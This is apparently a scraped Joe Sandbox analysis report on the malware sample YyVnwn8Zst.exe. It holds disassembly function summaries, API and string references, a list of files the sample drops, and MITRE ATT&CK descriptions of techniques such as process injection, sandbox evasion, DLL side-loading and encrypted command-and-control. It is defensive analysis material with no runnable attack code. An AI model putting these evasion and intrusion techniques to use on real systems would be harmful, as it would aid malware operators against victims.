Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 508a7545cd9675eca434abbd3fe5994820486329c798d74d3b033fce6636bdc7
Instruction ID: 8d379b1db26dbf6313e25ae977bf3fe9c315e7b71b7179457e2a0df8e0fc9e5a
Opcode Fuzzy Hash: 508a7545cd9675eca434abbd3fe5994820486329c798d74d3b033fce6636bdc7
Instruction Fuzzy Hash: 2B51B571E00249EFDF14DFA9C881AADBBF9EF58310F2441A9E854E7341E775AE058B90

Function 00BC7663 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC7668
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BC7804

Part of subcall function 00BCA1D3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BCA009,?,?,?,00BC9EA2,?,00000001,00000000,?,?), ref: 00BCA1E7
Part of subcall function 00BCA1D3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BCA009,?,?,?,00BC9EA2,?,00000001,00000000,?,?), ref: 00BCA218

Strings

:, xrefs: 00BC76D9

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: a18f45a20f9eeb685817f72b0efcdf5f7320c436995b84ab33ea29b6b07cf15e
Instruction ID: e02d7b78a8dd53c3f3c981b3e1770164fc5d57f73b77d412bde0aa49dca1ac1b
Opcode Fuzzy Hash: a18f45a20f9eeb685817f72b0efcdf5f7320c436995b84ab33ea29b6b07cf15e
Instruction Fuzzy Hash: 68416B71905258AAEB25EB60CC59FEEB7FCEF45340F0040EDB649A6182DB745F88CE61

Function 00BCB3C9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

\\?\, xrefs: 00BCB41B, 00BCB457, 00BCB4B8, 00BCB50B
UNC, xrefs: 00BCB465

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 770c63b61f1f45670ab49b29acddf006360b8ddf11c9d09716e001b76a2862c0
Instruction ID: a733892b1a3c7ee3da5b8de479c3e17dbc028162bb8f4186c28f98d6401d0d5b
Opcode Fuzzy Hash: 770c63b61f1f45670ab49b29acddf006360b8ddf11c9d09716e001b76a2862c0
Instruction Fuzzy Hash: 0B415C32440259ABCF21AF60CC53FBEB7EAEF25390F5444EDF858A3151E7719E948A60

Function 00BD8A72 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00BD8A7F

Strings

Shell.Explorer, xrefs: 00BD8AAB
about:blank, xrefs: 00BD8B1B

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 709f0b8a1aca259ad8a5e0a21c69fcbae9486b0608370c7b79e9db8425e7d3d5
Instruction ID: 34fe2d0e147c017b92d0c1a9f49afed01ec74ad617075e985216df067efd48e4
Opcode Fuzzy Hash: 709f0b8a1aca259ad8a5e0a21c69fcbae9486b0608370c7b79e9db8425e7d3d5
Instruction Fuzzy Hash: D0215BB2700646AFC7089F64C891E2AF7E8FF45715B04469BF2059B781EF71E911CB90

Function 00BCE898 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00BCE819: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BCE838
Part of subcall function 00BCE819: GetProcAddress.KERNEL32(00C07350,CryptUnprotectMemory), ref: 00BCE848

GetCurrentProcessId.KERNEL32(?,?,?,00BCE892), ref: 00BCE919

Strings

CryptProtectMemory failed, xrefs: 00BCE8D9
CryptUnprotectMemory failed, xrefs: 00BCE911

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: a8b998003ca78073449d40b70593b4920be76558066fffa8794ed1ff757aee42
Instruction ID: 1dd6b15f248b4e8c8f2e21a74e7df3f6dfda65f183e237f76c6d5789978391cb
Opcode Fuzzy Hash: a8b998003ca78073449d40b70593b4920be76558066fffa8794ed1ff757aee42
Instruction Fuzzy Hash: BF113A31B04205A7EB159B39CC41FBE33C9DF84B14B0441ADF921DB2A2EBB0ED40D2A0

Function 00BD050F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00BD0649,?,00000000,00000000), ref: 00BD0533
SetThreadPriority.KERNEL32(?,00000000), ref: 00BD057A

Part of subcall function 00BC6DE8: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BC6E06

Strings

CreateThread failed, xrefs: 00BD053F

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 2a0a9cc3512dd9e2f0f40c20631e95219ec285456cd249fe7cc72d5914b89b1d
Instruction ID: f4217096f00e3d32c145034b39b5efc5548bd63980390ef6a1407f12ce84a997
Opcode Fuzzy Hash: 2a0a9cc3512dd9e2f0f40c20631e95219ec285456cd249fe7cc72d5914b89b1d
Instruction Fuzzy Hash: E801DBB13583056BD6247F60AC81F66B3D8EB50755F20016EFA82572C0DEE1A840C730

Function 00BC12D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00BCD754: _swprintf.LIBCMT ref: 00BCD77A
Part of subcall function 00BCD754: _strlen.LIBCMT ref: 00BCD79B
Part of subcall function 00BCD754: SetDlgItemTextW.USER32(?,00BFD154,?), ref: 00BCD7FB
Part of subcall function 00BCD754: GetWindowRect.USER32(?,?), ref: 00BCD835
Part of subcall function 00BCD754: GetClientRect.USER32(?,?), ref: 00BCD841

GetDlgItem.USER32(00000000,00003021), ref: 00BC131B
SetWindowTextW.USER32(00000000,00BF22E4), ref: 00BC1331

Strings

0, xrefs: 00BC12DA

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 770f57fd72b5027f7adc119c17d4ee5749be7628e849552eb97817df6a148fc6
Instruction ID: fc75c58f5099ab4752b5e725d28272ed89215d26bd8c72abf7bc0c1acb2a6eb7
Opcode Fuzzy Hash: 770f57fd72b5027f7adc119c17d4ee5749be7628e849552eb97817df6a148fc6
Instruction Fuzzy Hash: 1AF081B0640288B7DF150F148C49FF93FDAAB45349F00849CBD45724A2CB74C955EB14

Function 00BD04D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00BD06F6,?,?,?,?,00BF146D,000000FF,?,00BCA6B6,?,?,?,00BF146D,000000FF), ref: 00BD04DA
GetLastError.KERNEL32(?,?,?,?,00BF146D,000000FF,?,00BCA6B6,?,?,?,00BF146D,000000FF), ref: 00BD04E6

Part of subcall function 00BC6DE8: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BC6E06

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00BD04EF

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: aed930dd70306597446a7de5b793c7a13937696d33ebe74ffb4b2d379a9ecc2a
Instruction ID: 59758384f5c65565a61798e7eafddcf6e48ce5f970d192463fd9755485c92bbc
Opcode Fuzzy Hash: aed930dd70306597446a7de5b793c7a13937696d33ebe74ffb4b2d379a9ecc2a
Instruction Fuzzy Hash: 0AD05E7260942127DA0133386C0AFBF7A559F12334F2147A9F636672F5CE204981C6D5

Function 00BCD70A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00BCD007,?), ref: 00BCD70F
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00BCD007,?), ref: 00BCD71D

Strings

RTL, xrefs: 00BCD717

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 4b9e05c24809458a01bcbc26802d29bfd3e2bfc6988524f5a97b352c61c0b846
Instruction ID: 4804ed09b68dd810363d4e12f484d2ff8e83194b1a65bb6dcf51c6273c40acba
Opcode Fuzzy Hash: 4b9e05c24809458a01bcbc26802d29bfd3e2bfc6988524f5a97b352c61c0b846
Instruction Fuzzy Hash: 4DC0123224175166D73027307D0DFA32D885B01B51F050499F242DB1D0DDA5C841C650

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report YyVnwn8Zst.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\9e146be90.js

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\11909669

C:\Users\user\AppData\Local\Temp\4157934657

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1lxci2h.tsb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm5ptztb.eew.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_maknmkya.4s1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5nm0kys.1oc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_snmggjjd.qfj.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_soctrtec.eou.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhh5qx23.n4n.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymujq1dq.203.ps1

C:\Users\user\AppData\Local\Temp\cerodedu.ads

C:\Users\user\AppData\Local\Temp\esadiftwin.dm

Windows Analysis Report
YyVnwn8Zst.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre